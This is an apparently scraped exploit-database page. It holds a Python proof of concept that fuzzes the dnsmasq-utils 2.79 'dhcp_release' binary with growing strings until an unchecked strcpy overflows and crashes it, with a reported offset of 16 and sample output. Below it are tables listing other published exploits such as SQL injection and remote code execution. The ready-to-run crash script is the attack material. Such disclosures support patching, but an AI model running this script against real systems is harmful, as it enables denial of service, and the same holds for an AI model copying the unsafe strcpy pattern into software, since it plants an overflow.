Menu
Author
JosueEncinar
Platform
linux
Release date
2020-04-07
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 | # Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC) # Date: 2020-04-06 # Exploit Author: Josue Encinar # Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1 # Version: 2.79 # Tested on: Ubuntu 18.04 from subprocess import Popen, PIPE data = "" bof = False for i in range (1, 200): A = "A"*i data = f"dhcp_release {A} 1 1" try: result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True) error = result.stderr.read().decode() if "Aborted (core dumped)" in error: print("[+] Buffer Overflow detected!") print(f"[*] Offset: {i}") bof = True break except Exception as e: print(f"[-] {e}") if not bof: print("[-] No buffer overflow...") ## Check line 273 in dhcp_release.c ### strcpy(ifr.ifr_name, argv[1]); # ## PoC: # josue@ubuntu:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py # *** buffer overflow detected ***: dhcp_release terminated # [+] Buffer Overflow detected! # [*] Offset: 16 |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2020-06-30 | "Reside Property Management 3.0 - 'profile' SQL Injection" | webapps | php | "Behzad Khalifeh" |
| 2020-06-30 | "Victor CMS 1.0 - 'user_firstname' Persistent Cross-Site Scripting" | webapps | php | "Anushree Priyadarshini" |
| 2020-06-26 | "OpenEMR 5.0.1 - 'controller' Remote Code Execution" | webapps | php | "Emre ΓVΓNΓ" |
| 2020-06-26 | "Windscribe 1.83 - 'WindscribeService' Unquoted Service Path" | local | windows | "Ethan Seow" |
| 2020-06-26 | "KiteService 1.2020.618.0 - Unquoted Service Path" | local | windows | "Marcos Antonio LeΓ³n" |
| 2020-06-25 | "FHEM 6.0 - Local File Inclusion" | webapps | php | "Emre ΓVΓNΓ" |
| 2020-06-25 | "mySCADA myPRO 7 - Hardcoded Credentials" | remote | hardware | "Emre ΓVΓNΓ" |
| 2020-06-24 | "BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting" | webapps | multiple | "William Summerhill" |
| 2020-06-23 | "Online Student Enrollment System 1.0 - Cross-Site Request Forgery (Add Student)" | webapps | php | BKpatron |
| 2020-06-23 | "Lansweeper 7.2 - Incorrect Access Control" | local | windows | "Amel BOUZIANE-LEBLOND" |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2020-06-02 | "vCloud Director 9.7.0.15498291 - Remote Code Execution" | remote | linux | aaronsvk |
| 2020-05-26 | "Pi-hole 4.4.0 - Remote Code Execution (Authenticated)" | webapps | linux | Photubias |
| 2020-05-10 | "Pi-hole < 4.4 - Authenticated Remote Code Execution / Privileges Escalation" | webapps | linux | "Nick Frichette" |
| 2020-05-10 | "Pi-hole < 4.4 - Authenticated Remote Code Execution" | webapps | linux | "Nick Frichette" |
| 2020-04-22 | "Mahara 19.10.2 CMS - Persistent Cross-Site Scripting" | webapps | linux | Vulnerability-Lab |
| 2020-04-20 | "Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)" | remote | linux | Metasploit |
| 2020-04-17 | "Nexus Repository Manager - Java EL Injection RCE (Metasploit)" | remote | linux | Metasploit |
| 2020-04-16 | "Pandora FMS - Ping Authenticated Remote Code Execution (Metasploit)" | remote | linux | Metasploit |
| 2020-04-16 | "ThinkPHP - Multiple PHP Injection RCEs (Metasploit)" | remote | linux | Metasploit |
| 2020-04-07 | "dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)" | dos | linux | JosueEncinar |
| Release Date | Title | Type | Platform | Author |
|---|---|---|---|---|
| 2020-04-07 | "dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)" | dos | linux | JosueEncinar |
| 2019-10-01 | "kic 2.4a - Denial of Service" | dos | linux | JosueEncinar |
import requestsresponse = requests.get('https://www.nmmapper.com/api/exploitdetails/48301/?format=json')For full documentation follow the link above